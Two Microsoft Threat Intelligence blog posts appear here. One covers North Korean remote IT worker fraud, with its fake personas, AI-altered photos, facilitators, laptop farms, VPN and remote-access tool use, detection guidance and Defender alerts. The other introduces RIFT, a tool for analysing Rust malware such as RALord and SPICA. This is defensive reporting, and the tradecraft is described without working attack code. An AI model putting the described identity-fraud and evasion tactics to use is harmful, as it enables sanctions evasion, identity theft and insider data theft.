Microsoft Threat Intelligence tracks North Korean IT remote worker activity as Jasper Sleet (formerly known as Storm-0287). We also track several other North Korean activity clusters that pursue fraudulent employment using similar techniques and tools, including Storm-1877 and Moonstone Sleet. To disrupt this activity and protect our customers, we’ve suspended 3,000 known Microsoft consumer accounts (Outlook/Hotmail) created by North Korean IT workers. We have also implemented several detections to alert our customers of this activity through Microsoft Entra ID Protection and Microsoft Defender XDR as noted at the end of this blog. As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. As we continue to observe more attempts by threat actors to leverage AI, not only do we report on them, but we also have principles in place to take action against them.
This blog provides additional information on the North Korean remote IT worker operations we published previously, including Jasper Sleet’s usual TTPs to secure employment, such as using fraudulent identities and facilitators. We also provide recent observations regarding their use of AI tools. Finally, we share detailed guidance on how to investigate, monitor, and remediate possible North Korean remote IT worker activity, as well as detections and hunting capabilities to surface this threat.
From North Korea to the world: The remote IT workforce
Since at least early 2020, Microsoft has tracked a global operation conducted by North Korea in which skilled IT workers apply for remote job opportunities to generate revenue and support state interests. These workers present themselves as foreign (non-North Korean) or domestic-based teleworkers and use a variety of fraudulent means to bypass employment verification controls.
North Korea’s fraudulent remote worker scheme has since evolved, establishing itself as a well-developed operation that has allowed North Korean remote workers to infiltrate technology-related roles across various industries. In some cases, victim organizations have even reported that remote IT workers were some of their most talented employees. Historically, this operation has focused on applying for IT, software development, and administrator positions in the technology sector. Such positions provide North Korean threat actors access to highly sensitive information to conduct information theft and extortion, among other operations.
North Korean IT workers are a multifaceted threat because not only do they generate revenue for the North Korean regime, which violates international sanctions, they also use their access to steal sensitive intellectual property, source code, or trade secrets. In some cases, these North Korean workers even extort their employer into paying them in exchange for not publicly disclosing the company’s data.
Between 2020 and 2022, the US government found that over 300 US companies in multiple industries, including several Fortune 500 companies, had unknowingly employed these workers, indicating the magnitude of this threat. The workers also attempted to gain access to information at two government agencies. Since then, the cybersecurity community has continued to detect thousands of North Korean workers. On January 3, 2025, the Justice Department released an indictment identifying two North Korean nationals and three facilitators responsible for conducting fraudulent work between 2018 and 2024. The indicted individuals generated a revenue of at least US$866,255 from only ten of the at least 64 infiltrated US companies.
North Korean threat actors are evolving across the threat landscape to incorporate more sophisticated tactics and tools to conduct malicious employment-related activity, including the use of custom and AI-enabled software.
Tactics and techniques
The tactics and techniques employed by North Korean remote IT workers involve a sophisticated ecosystem of crafting fake personas, performing remote work, and securing payments. North Korean IT workers apply for remote roles, in various sectors, at organizations across the globe.
They create, rent, or procure stolen identities that match the geo-location of their target organizations (for example, they would establish a US-based identity to apply for roles at US-based companies), create email accounts and social media profiles, and establish legitimacy through fake portfolios and profiles on developer platforms like GitHub and LinkedIn. Additionally, they leverage AI tools to enhance their operations, including image creation and voice-changing software. Facilitators play a crucial role in validating fraudulent identities and managing logistics, such as forwarding company hardware and creating accounts on freelance job websites. To evade detection, these workers use VPNs, virtual private servers (VPSs), and proxy services as well as RMM tools to connect to a device housed at a facilitator’s laptop farm located in the country of the job.
Figure 1. The North Korean IT worker ecosystem
Crafting fake personas and profiles
The North Korean remote IT worker fraud scheme begins with the procurement of identities for the workers. These identities, which can be stolen or “rented” from witting individuals, include names, national identification numbers, and dates of birth. The workers might also leverage services that generate fraudulent identities, complete with seemingly legitimate documentation, to fabricate their personas. They then create email accounts and social media pages they use to apply for jobs, often indirectly through staffing or contracting companies. They also apply for freelance opportunities through freelancer sites as an additional avenue for revenue generation. Notably, they often use the same names/profiles repeatedly rather than creating unique personas for each successful infiltration.
Additionally, the North Korean IT workers have used fake profiles on LinkedIn to communicate with recruiters and apply for jobs.
Figure 2. An example of a North Korean IT worker LinkedIn profile that has since been taken down.
The workers tailor their fake resumes and profiles to match the requirements for specific remote IT positions, thus increasing their chances of getting selected. Over time, we’ve observed these fake resumes and employee documents noticeably improving in quality, now appearing more polished and lacking grammatical errors facilitated by AI.
Establishing digital footprint
After creating their fake personas, the North Korean IT workers then attempt to establish legitimacy by creating digital footprints for these fake personas. They typically leverage communication, networking, and developer platforms, (for example, GitHub) to showcase their supposed portfolio of previous work samples:
Figure 3. Example profile used by a North Korean IT worker that has since been taken down.
Using AI to improve operations
Microsoft Threat intelligence has observed North Korean remote IT workers leveraging AI to improve the quantity and quality of their operations. For example, in October 2024, we found a public repository containing actual and AI-enhanced images of suspected North Korean IT workers:
Figure 4. Photos of potential North Korean IT workers
The repository also contained the resumes and email accounts used by the said workers, along with the following tools and resources they can use to secure employment and to do their work:
VPS and VPN accounts, along with specific VPS IP addresses
Playbooks on conducting identity theft and creating and bidding jobs on freelancer websites
Wallet information and suspected payments made to facilitators
LinkedIn, GitHub, Upwork, TeamViewer, Telegram, and Skype accounts
Tracking sheet of work performed, and payments received by the IT workers
Image creation
Based on our review of the repository mentioned previously, North Korean IT workers appear to conduct identity theft and then use AI tools like Faceswap to move their pictures over to the stolen employment and identity documents. The attackers also use these AI tools to take pictures of the workers and move them to more professional looking settings. The workers then use these AI-generated pictures on one or more resumes or profiles when applying for jobs.
Figure 5. Use of AI apps to modify photos used for North Korean IT workers’ resumes and profilesFigure 6. Examples of resumes for North Korean IT workers. These two resumes use different versions of the same photo.
Communications
Microsoft Threat Intelligence has observed that North Korean IT workers are also experimenting with other AI technologies such as voice-changing software. While we haven’t observed threat actors using combined AI voice and video products as a tactic first hand, we do recognize that combining these technologies could allow future threat actor campaigns to trick interviewers into thinking they aren’t communicating with a North Korean IT worker. If successful, this tactic could allow the North Korean IT workers to do interviews directly and no longer rely on facilitators standing in for them on interviews or selling them account access.
Facilitators for initial access
North Korean remote IT workers require assistance from a witting facilitator to help find jobs, pass the employment verification process, and once hired, successfully work remotely. We’ve observed Jasper Sleet advertising job opportunities for facilitator roles under the guise of partnering with a remote job candidate to help secure an IT role in a competitive market:
Figure 7. Example of a job opportunity for a facilitator role
The IT workers may have the facilitators assist in creating accounts on remote and freelance job websites. They might also ask the facilitator to perform the following tasks as their relationship builds:
Create a bank account for the North Korean IT worker, or lend their (the facilitator’s) own account to the worker
Purchase mobile phone numbers or SIM cards
During the employment verification process, the witting accomplice helps the North Korean IT workers validate the latter’s fraudulent identities using online background check service providers. The documents submitted by the workers include fake or stolen drivers’ licenses, social security cards, passports, and permanent resident identification cards. Workers train using interview scripts, which include a justification for why the employee must work remotely.
Once hired, the remote workers direct company laptops and hardware to be sent to the address of the accomplice. The accomplice then either runs a laptop farm that provides the laptops with an internet connection at the geo-location of the role or forwards the items internationally. For hardware that remain in the country of the role, the accomplice signs into the computers and installs software that enables the workers to connect remotely. Remote IT workers might also access devices remotely using IP-based KVM devices, like PiKVM or TinyPilot.
Defense evasion and persistence
To conceal their physical location as well as maintain persistence and blend into the target organization’s environment, the workers typically use VPNs (particularly Astrill VPN), VPSs, proxy services, and RMM tools. Microsoft Threat Intelligence has observed the persistent use of JumpConnect, TinyPilot, Rust Desk, TeamViewer, AnyViewer, and Anydesk. When an in-person presence or face-to-face meeting is required, for example to confirm banking information or attend a meeting, the workers have been known to pay accomplices to stand in for them. When possible, however, the workers eliminate all face-to-face contact, offering fraudulent excuses for why they are not on camera during video teleconferencing calls or speaking.
Attribution
Microsoft Threat Intelligence uses the name Jasper Sleet (formerly known as Storm-0287) to represent activity associated with North Korean’s remote IT worker program. These workers are primarily focused on revenue generation, use remote access tools, and likely fall under a particular leadership structure in North Korea. We also track several other North Korean activity clusters that pursue fraudulent employment using similar techniques and tools, including Storm-1877 and Moonstone Sleet.
How Microsoft disrupts North Korean remote IT worker operations with machine learning
Microsoft has successfully scaled analyst tradecraft to accelerate the identification and disruption of North Korean IT workers in customer environments by developing a custom machine learning solution. This has been achieved by leveraging Microsoft’s existing threat intelligence and weak signals generated by monitoring for many of the red flags listed in this blog, among others. For example, this solution uses impossible time travel risk detections, most commonly between a Western nation and China or Russia. The machine learning workflow uses these features to surface suspect accounts most likely to be North Korean IT workers for assessment by Microsoft Threat Intelligence analysts.
Once Microsoft Threat Intelligence reviews and confirms that an account is indeed associated with a North Korean IT worker, customers are then notified with a Microsoft Entra ID Protection risk detection warning of a risky sign-in based on Microsoft’s threat intelligence. Microsoft Defender XDR customers also receive the alert Sign-in activity by a suspected North Korean entity in the Microsoft Defender portal.
Defending against North Korean remote IT worker infiltration
Defending against the threats from North Korean remote IT workers involves a threefold strategy:
Ensuring a proper vetting approach is in place for freelance workers and vendors
Monitoring for anomalous user activity
Responding to suspected Jasper Sleet signals in close coordination with your insider risk team
Investigate
How can you identify a North Korean remote IT worker in the hiring process?
To protect your organization against a potential North Korean insider threat, it is important for your organization to prioritize a process for verifying employees to identify potential risks. The following can be used to assess potential employees:
Confirm the potential employee has a digital footprint and look for signs of authenticity. This includes a real phone number (not VoIP), a residential address, and social media accounts. Ensure the potential employee’s social media/professional accounts are not highly similar to the accounts of other individuals. In addition, check that the contact phone number listed on the potential employee’s account is unique and not also used by other accounts.
Scrutinize resumes and background checks for consistency of names, addresses, and dates. Consider contacting references by phone or video-teleconference rather than email only.
Exercise greater scrutiny for employees of staffing companies, since this is the easiest avenue for North Korean workers to infiltrate target companies.
Search whether a potential employee is employed at multiple companies using the same persona.
Ensure the potential employee is seen on camera during multiple video telecommunication sessions. If the potential employee reports video and/or microphone issues that prohibit participation, this should be considered a red flag.
During video verification, request individuals to physically hold driver’s licenses, passports, or identity documents up to camera.
Keep records, including recordings of video interviews, of all interactions with potential employees.
Require notarized proof of identity.
Monitor
How can your organization prevent falling victim to the North Korean remote IT worker technique?
To prevent the risks associated with North Korean insider threats, it’s vital to monitor for activity typically associated with this fraudulent scheme.
Monitor for identifiable characteristics of North Korean remote workers
Microsoft has identified the following characteristics of a North Korean remote worker. Note that not all the criteria are necessarily required, and further, a positive identification of a remote worker doesn’t guarantee that the worker is North Korean.
The employee lists a Chinese phone number on social media accounts that is used by other accounts.
The worker’s work-issued laptop authenticates from an IP address of a known North Korean IT worker laptop farm, or from foreign—most commonly Chinese or Russian—IP addresses even though the worker is supposed to have a different work location.
The worker is employed at multiple companies using the same persona. Employees of staffing companies require heightened scrutiny, given this is the easiest way for North Korean workers to infiltrate target companies.
Once a laptop is issued to the worker, RMM software is immediately downloaded onto it and used in combination with a VPN.
The worker has never been seen on camera during a video telecommunication session or is only seen a few times. The worker may also report video and/or microphone issues that prohibit participation from the start.
The worker’s online activity doesn’t align with routine co-worker hours, with limited engagement across approved communication platforms.
Monitor for activity associated with Jasper Sleet access
If RMM tools are used in your environment, enforce security settings where possible, to implement MFA:
Use Windows Defender Application Control or AppLocker to create policies to block unapproved IT management tools. Consider hunting for unapproved RMM software installations and creating custom detections (Investigation & response > Hunting > Advanced hunting > Manage rules > Create custom detection) for any advanced hunting queries that are useful indicators of anomalous or unapproved activity in your environment.
If an unapproved installation is discovered, reset passwords for accounts used to install the RMM services. If a system-level account was used to install the software, further investigation may be warranted.
Monitor for impossible travel—for example, a supposedly US-based employee signing in from China or Russia.
Monitor for use of public VPNs such as Astrill. For example, IP addresses associated with VPNs known to be used by Jasper Sleet can be added to Sentinel watchlists. Or, Microsoft Defender for Identity can integrate with your VPN solution to provide more information about user activity, such as extra detection for abnormal VPN connections.
Monitor for signals of insider threats in your environment. Microsoft Purview Insider Risk Management can help identify potentially malicious or inadvertent insider risks.
Monitor for consistent user activity outside of typical working hours.
Remediate
What are the next steps if you positively identify a North Korean remote IT worker employed at your company?
Because Jasper Sleet activity follows legitimate job offers and authorized access, Microsoft recommends approaching confirmed or suspected Jasper Sleet intrusions with an insider risk approach using your organization’s insider risk response plan or incident response provider like Microsoft Incident Response. Some steps might include:
Restrict response efforts to a small, trusted insider risk working group, trained in operational security (OPSEC) to avoid tipping off subjects and potential collaborators.
Rapidly evaluate the subject’s proximity to critical assets, such as:
Leadership or sensitive teams
Direct reports or vendor staff the subject has influence over
Suppliers or vendors
People/non-people accounts, production/pre-production environments, shared accounts, security groups, third-party accounts, security groups, distribution groups, data clusters, and more
Conduct preliminary link analysis to:
Detect relationships with potential collaborators, supporters, or other potential aliases operated by the same actor
Identify shared indicators (for example, shared IP addresses, behavioral overlap)
Avoid premature action that might alert other Jasper Sleet operators
Conduct a risk-based prioritization of efforts, informed by:
Placement and access to critical assets (not necessarily where you identified them)Stakeholder insight from potentially impacted business units
Business impact considerations of containment (which might support additional collection/analysis) or mitigation (for example, eviction)
Conduct open-source intelligence (OSINT) collection and analysis to:
Determine if the identity associated with the threat actor is associated with a real person. For example, North Korean IT workers have leveraged stolen identities of real US persons to facilitate their fraud. Conduct OSINT on all available personally identifiable information (PII) provided by the actor (name, date of birth, SSN, home of record, phone number, emergency contact, and others) and determine if these items are linked to additional North Korean actors, and/or real persons’ identities.
Gather all known external accounts operated by the alias/persona (for example, LinkedIn, GitHub, freelance working sites, bug bounty programs).
Perform analysis on account images using open-source tools such as FaceForensics++ to determine prevalence of AI-generated content. Detection opportunities within video and imagery include:
Temporal consistency issues: Rapid movements cause noticeable artifacts in video deepfakes as the tracking system struggles to maintain accurate landmark positioning.
Occlusion handling: When objects pass over the AI-generated content such as the face, deepfake systems tend to fail at properly reconstructing the partially obscured face.
Lighting adaptation: Changes in lighting conditions might reveal inconsistencies in the rendering of the face
Audio-visual synchronization: Slight delays between lip movements and speech are detectable under careful observation
Exaggerated facial expressions.
Duplicative or improperly placed appendages.
Pixelation or tearing at edges of face, eyes, ears, and glasses.
Engage counterintelligence or insider risk/threat teams to:
Understand tradecraft and likely next steps
Gain national-level threat context, if applicable
Make incremental, risk-based investigative and response decisions with the support of your insider threat working group and your insider threat stakeholder group; one providing tactical feedback and the other providing risk tolerance feedback.
Preserve evidence and document findings.
Share lessons learned and increase awareness.
Educate employees on the risks associated with insider threats and provide regular security training for employees to recognize and respond to threats, including a section on the unique threat posed by North Korean IT workers.
After an insider risk response to Jasper Sleet, it might be necessary to also conduct a thorough forensic investigation of all systems that the employee had access to for indicators of persistence, such as RMM tools or system/resource modifications.
For additional resources, refer to CISA’s Insider Threat Mitigation Guide. If you suspect your organization is being targeted by nation-state cyber activity, report it to the appropriate national authority. For US-based organizations, the Federal Bureau of Investigation (FBI) recommends reporting North Korean remote IT worker activity to the Internet Crime Complaint Center (IC3).
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
Alerts with the following title in the security center can indicate threat activity on your network:
Sign-in activity by a suspected North Korean entity
Microsoft Defender for Endpoint
Alerts with the following titles in the security center can indicate Jasper Sleet RMM activity on your network. These alerts, however, can be triggered by unrelated threat activity.
Suspicious usage of remote management software
Suspicious connection to remote access software
Microsoft Defender for Identity
Alerts with the following titles in the security center can indicate atypical identity access on your network. These alerts, however, can be triggered by unrelated threat activity.
Atypical travel
Suspicious behavior: Impossible travel activity
Microsoft Entra ID Protection
Microsoft Entra ID Protection risk detections inform Entra ID user risk events and can indicate associated threat activity, including unusual user activity consistent with known patterns identified by Microsoft Threat Intelligence research. Note, however, that these alerts can be also triggered by unrelated threat activity.
Microsoft Entra threat intelligence (sign-in): (RiskEventType: investigationsThreatIntelligence)
Microsoft Defender for Cloud Apps
Alerts with the following titles in the security center can indicate atypical identity access on your network. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel activity
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Hunting queries
Microsoft Defender XDR
Because organizations might have legitimate and frequent uses for RMM software, we recommend using the Microsoft Defender XDR advanced hunting queries available on GitHub to locate RMM software that hasn’t been endorsed by your organization for further investigation. In some cases, these results might include benign activity from legitimate users. Regardless of use case, all newly installed RMM instances should be scrutinized and investigated.
If any queries have high fidelity for discovering unsanctioned RMM instances in your environment, and don’t detect benign activity, you can create a custom detection rule from the advanced hunting query in the Microsoft Defender portal.
Microsoft Sentinel
The alert Insider Risk Sensitive Data Access Outside Organizational Geo-locationjoins Azure Information Protection logs (InformationProtectionLogs_CL) with Microsoft Entra ID sign-in logs (SigninLogs) to provide a correlation of sensitive data access by geo-location. Results include:
User principal name
Label name
Activity
City
State
Country/Region
Time generated
The recommended configuration is to include (or exclude) sign-in geo-locations (city, state, country and/or region) for trusted organizational locations. There is an option for configuration of correlations against Microsoft Sentinel watchlists. Accessing sensitive data from a new or unauthorized geo-location warrants further review.
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Today, Microsoft Threat Intelligence Center is excited to announce the release of RIFT, a tool designed to assist malware analysts automate the identification of attacker-written code within Rust binaries. Known for its efficiency, type safety, and robust memory safety, Rust has increasingly become a tool for creating malware, especially among financially motivated groups and nation-state entities. This shift has introduced new challenges for malware analysts as the unique characteristics of Rust binaries make static analysis more complex.
One of the primary challenges in reverse engineering malware developed with Rust lies in its layers of abstraction added through features such as memory safety and concurrency handling, making it more challenging to identify the behavior and intent of the malware. Compared to traditional languages, Rust binaries are often larger and more complex due to the incorporation of extensive library code. Consequently, reverse engineers must undertake the demanding task of distinguishing attacker-written code from standard library code, necessitating advanced expertise and specialized tools.
To address these pressing challenges, Microsoft Threat Intelligence Center has developed RIFT. RIFT underscores the growing need for specialized tools as cyber threat actors continue to leverage Rust’s features to evade detection and complicate analysis. The adoption of Rust by threat actors is a stark reminder of the ever-changing tactics employed in the cyber domain, and the increasing sophistication required to combat these threats effectively. In this blog post, we explore how threat actors are increasingly adopting Rust for malware development due to its versatility and how RIFT can be used to combat this threat by enhancing the efficiency and accuracy of Rust-based malware analysis.
Threat actors continue adopting Rust
As Rust gains popularity as a rapidly growing programming language, its use by malware authors is becoming more noticeable. Over the past five years, Microsoft Threat Intelligence Center and the broader security industry have observed financially motivated and state-supported groups increasingly using Rust for malware development.
Figure 1. Timeline of Rust-based threats
In 2021, the group behind the notorious BlackCat ransomware was among the first significant entities in the ransomware field to write their malicious programs in Rust. Following the appearance of the first malware families written in Rust, reverse engineers indicated that such malware presents a unique challenge for analysis.
Subsequently, several other groups began developing or rewriting their tools in the programming language. Nation-state threat actors have also selectively developed their malware in Rust.
Rust as a popular language for malware development
Rust is a versatile language known for its performance, type safety, concurrency, and memory safety. While these features benefit legitimate development, they also complicate static analysis of malicious files. The community has extensively addressed many of these challenges. One of the core issues in analyzing Rust binaries is differentiating between library code and code written by malware authors.
To illustrate the significance of this problem, Microsoft Threat Intelligence Center conducted a simple experiment. A small PE EXE file that downloads data from a website and saves it on disk as sample_data.txt is generated with Microsoft 365 Copilot. The program is first compiled in C++ and then in Rust. The C++ program is compiled using Microsoft Visual C++ (MSVC) with Visual Studio 2022, in release mode for the 64-bit architecture and dynamically linked, using default settings. The Rust binary is compiled using compiler version rustc 1.89.0-nightly (16d2276fa 2025-05-16), also in release mode and with default settings.
Figure 2. Simple downloader program in C++ to the left and Rust to the right
Next, both programs are loaded into IDA Pro, and a simple complexity analysis is performed by counting and comparing the number of disassembled and identified functions. Additionally, functions are categorized as annotated or not annotated. An annotated function is one that is automatically detected by IDA’s built-in signatures or algorithms. It should be noted that IDA has capabilities to enhance library recognition, but these were not used for this experiment.
While both programs implement similar functionalities, the total number of disassembled functions in the C++ program is lower than 100, while the Rust programs pack almost 10,000 functions. Furthermore, the size of the C++ program is lower than 20 KB, while the Rust program is larger than 3 MB.
Programs written in Rust are typically statically linked, embedding all dependencies directly into the executable. As a result, binaries are larger with a high volume of functions, requiring analysts to distinguish first between third-party library code and attacker-authored logic.
To address this key problem, Microsoft Threat Intelligence Center is releasing an internally developed tool: RIFT.
This open-source project is designed to help reverse engineers and analysts more efficiently identify attacker-authored logic within Rust-based malware.
From source code to binary
Figure 3. Overview of Rust developer toolset
Before delving into the inner workings of RIFT, it is essential to have a fundamental understanding of how Rust binaries are compiled. As illustrated in the diagram above, Rust developers typically engage with three primary components and two endpoints:
cargo – The package manager
rustc – The Rust compiler
rustup – The Rust update manager
static.rust-lang.org – S3 bucket that hosts pre-compiled compilers and toolchains
crates.io – Rust community’s crate registry
Once a developer has conceptualized what they intend to develop, a typical workflow may proceed as follows:
Using the cargo tool, the developer initializes a new projected named “test”.
They opt not to use the latest Rust compiler but a specific version. They execute rustup install 1.84.0-x86_64-pc-windows-msvc to install the desired compiler version and configure the project to use the installed compiler.
They determine that their project should communicate via HTTP and incorporate a third-party dependency. They run cargo add request to install the latest version of the third-party library, request.
Following these steps will result in a fully configured project. Upon completion, the developer may run cargo build to finalize the binary, compiling the project.
Static artifacts and where to find them
Reverse engineers are usually handed the final development product of the malware author, oftentimes without information such as the compiler used or third-party dependencies. While it is highly likely that malware authors use the same tools as reverse engineers for development, no insights into the exact environment are available.
However, understanding the development toolchain can assist in quickly distinguishing library code from author written logic. Fortunately, various indicators can be extracted that provide insights.
Rust compiler version
Rust binaries typically include metadata from the compiler that identifies the Rust version used to compile the binary. A config.toml file is provided alongside pre-compiled Rust compilers and toolchains. This configuration file contains the commit hash and the corresponding Rust compiler version of the pre-compiled product. By extracting the commit hash from the final binary output, it is possible to map the Git commit hash back to the appropriate Rust compiler version by parsing all available config.toml files from the official release channels.
Rust crates
As mentioned above, cargo is used to add dependencies to a project. Next to the Git commit hash, metadata extracted from Rust binaries also include the statically linked dependencies and their versions.
Figure 4. Extractable dependencies from strings
The above image shows how filtering for certain strings can display which dependencies were likely statically linked into RALord ransomware.
Introducing RIFT
RIFT is an open-source tool consisting of a set of IDA Pro (supporting versions >=9.0) plugins and Python scripts that aim to assist reverse engineers and other software analysts in annotating library code in Rust malware. It essentially consists of three components:
RIFT Static Analyzer: IDA Pro plugin to extract the Rust compiler commit hash and embedded dependencies from a binary.
RIFT Generator: A Python program to automate the process of Rust compiler identification, FLIRT signature generation of used Rust compiler and dependencies, as well as automation of binary diffing.
RIFT Diff Applier: IDA Pro plugin to consume binary diffing information generated by RIFT Generator.
Extracting static information with RIFT Static Analyzer
In the previous section, we listed which indicators can be extracted from Rust binaries that give insights into which Rust compiler and dependencies were used. RIFT Static Analyzer automates the extraction process and stores the information in a JSON file for further processing. Furthermore, the plugin also extracts the architecture the binary was compiled for and the target operating system. In the below image, the target operating system is labeled as target_triple.
Figure 5. Overview of RIFT Static Analyzer
RIFT Generator: Automating FLIRT signature generation and auto diffing
Information gathered and stored by RIFT Static Analyzer can then be further processed by RIFT Generator.
Figure 6. RIFT Generator command line options
The Python program automates the process of compilation, data collection, FLIRT signature generation, and binary comparison.
It is essentially a wrapper around the following tools:
Cargo (Rust package manager) to manage the downloading and compiling of dependencies
Hexray’s FLAIR tools, specifically sigmake.exe and pcf.exe, to generate FLIRT signatures
Hexray’s text interface version of IDA, idat.exe, to automate binary analysis and disassembly
The open-source tool Diaphora to facilitate binary diffing
Figure 7. Phases of RIFT Generator
The above image provides an overview of the phases RIFT Generator processes through. RIFT Generator reads the JSON file produced by RIFT Static Analyzer and downloads the corresponding Rust compiler, as well as the dependencies.
It is worth noting that upon completion of phase 1, both the code of the downloaded compiler and compiled crates are compressed as COFF files into RLIB files. RLIB is essentially a Rust-specific archive format similar to TAR. Once decompressed in phase 2, the COFF files are extracted and further processed.
FLIRT signatures and binary diffing
To provide information necessary for annotating library code in Rust binaries accurately, RIFT uses two known techniques for pattern matching: FLIRT signatures and binary diffing.
FLIRT stands for Fast Library Identification and Recognition Technology and enables IDA to identify standard library functions produced by its supported compilers. A characteristic of this technology is that library recognition is very precise. Therefore, functions that have a high similarity may not be flagged by FLIRT signatures due to their strict criteria.
Additionally, RIFT automates the process of binary diffing the collected COFF files against the target binary by leveraging IDA’s command line utility (idat.exe) and the Diaphora plugin.
Figure 8. Overview of experimental batch binary diffing process
In general, both approaches have their own advantages and disadvantages, which are listed below.
Higher false positive rate, but less strict and can fill gaps where FLIRT signatures fail due to strictness
With RIFT, in majority of cases, FLIRT signatures can be generated quickly
In current state, batch binary diffing approach might take multiple hours
Not well applicable if dependencies and Rust compiler version are not available
Approach might yield useful results even if Rust compiler version and dependencies were not available
Consuming binary diffing information
If the binary diffing approach is applied, a second IDA plugin called RIFT Diff Applier can be used to apply the diffing results. In contrast to FLIRT signatures, the RIFT Diff Applier offers analysts an interactive, semi-manual method for identifying library code. It operates in two modes:
Interactive mode
Auto rename mode
Figure 9. GUI of RIFT Diff Applier
By default, symbol names in COFF files are mangled. Consequently, if RIFT Generator generates the binary diffing information and stores it in the JSON format, the symbol names are also mangled. To address this issue, enabling Name Demangling can assist in attempting to demangle these names. We are continuously improving the tool, and currently, rust-demangler is being used for this purpose.
For both modes, a minimum similarity ratio can be specified. Functions will only be displayed or renamed if they meet or exceed the specified similarity threshold. Once the user clicks “OK”, a new window will appear in IDA with the title RIFT. Users can now right click on a function name and display the top three matching functions with the highest similarity determined through binary diffing or use the CTRL+X shortcut.
Figure 10. RIFT window in IDA displaying top matching functions
Applying RIFT on RALord ransomware
Having introduced the functionalities of RIFT, we will now examine its practical application in analyzing RALord ransomware and how RIFT’s FLIRT signature generation can be used to immensely reduce time identifying library functions in RALord.
First, RIFT Static Analyzer is used to dump the extractable dependencies, Git commit hash of the Rust compiler, target architecture, and target operating system. Next, the information is fed into RIFT Generator.
Once RIFT Generator has finished generating FLIRT signatures, they can either be loaded one by one manually or by using our script shared in the RIFT GitHub repository named “ida_apply_flirt_from_folder.py”.
The image below compares parts of the main function before and after application of RIFT. After applying the FLIRT signatures generated from the extracted dependencies and Rust compiler, the majority of library and compiler code is identified in the main function. As a result, reverse engineers can focus solely on the threat actor code instead of spending time weeding out the library code.
Figure 11. Comparing decompiled code before and after applying generated FLIRT signatures
Applying RIFT on SPICA
In some use cases, FLIRT signature application might not be enough, for example when conducting a deep dive. RIFT’s binary diffing approach can provide additional information to improve library code recognition in addition to FLIRT signatures.
Having demonstrated the effectiveness of RIFT in applying FLIRT signatures to streamline the analysis of RALord ransomware, we now turn our focus to applying the binary diffing approach on SPICA, a backdoor written in Rust. This transition highlights scenarios where FLIRT signatures alone might be insufficient, necessitating a deeper, complementary analysis.
Similar to before, RIFT Static Analyzer is used first and the extracted information is fed into RIFT Generator. However, this time, we apply FLIRT signature generation and binary diffing.
Figure 12. Enabling FLIRT signature generation and binary diffing
To use the binary diffing approach, Diaphora must be used first to generate the corresponding SQLite file. It is worth noting that depending on the size of the binary and extracted dependencies, the binary diffing procedure can take multiple hours.
Once done, RIFT Diff Applier can be used to load the binary diffing output file.
Figure 13. Rift Diff Applier in use
A benefit of this approach is that for certain functions where FLIRT signatures failed to properly label the library function due to its strictness, RIFT Diff Applier can provide useful and reliable information where the similarity is high. Furthermore, thinking about detection engineering, the approach can also help identify or filter out potential library functions, especially when writing signatures on code segments.
Afterwords: Open sourcing RIFT
Rust’s strong performance, safety-focused design, cross-compilation support, and concurrency features have led to its increased adoption by threat actors for developing complex malware. This growing shift towards Rust represents a yet another evolution in the threat landscape, enabling attackers to create malware that is not more resistant to detection and analysis.
For malware analysts, this trend introduces a daunting set of challenges. Rust’s innovative features often result in binaries that are harder to decompile and analyze, making reverse engineering a time-intensive process. Analysts are frequently left grappling with unfamiliar patterns and library-heavy outputs, which further complicate their efforts to dissect malware and develop detection methods.
To address these challenges, we are proud to announce the open sourcing of RIFT. Designed to help accelerate Rust malware analysis by assisting reverse engineers to recognize library code in Rust malware through FLIRT signatures and binary diffing, RIFT further reinforces global efforts to equip security professionals with proper tools to defend against threats. By making RIFT freely available to the cybersecurity community, we aim to foster collaboration and innovation in combating the rise of Rust-based malware. We would like to extend a special thanks to the author of the Diaphora project for their invaluable contribution to the reverse engineering community.
Microsoft’s ongoing research and development efforts, including the creation of tools like RIFT, underscore our commitment to protecting customers and securing the cyber landscape. By enhancing the efficiency and accuracy of malware analysis, we aim to keep pace with evolving threats and ensure the safety of users worldwide. This research highlights the critical need for advanced security measures to safeguard against such increasingly sophisticated cyber threats.
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the latest changes in the broader threat landscape, listen to the Microsoft Threat Intelligence podcast.
Login
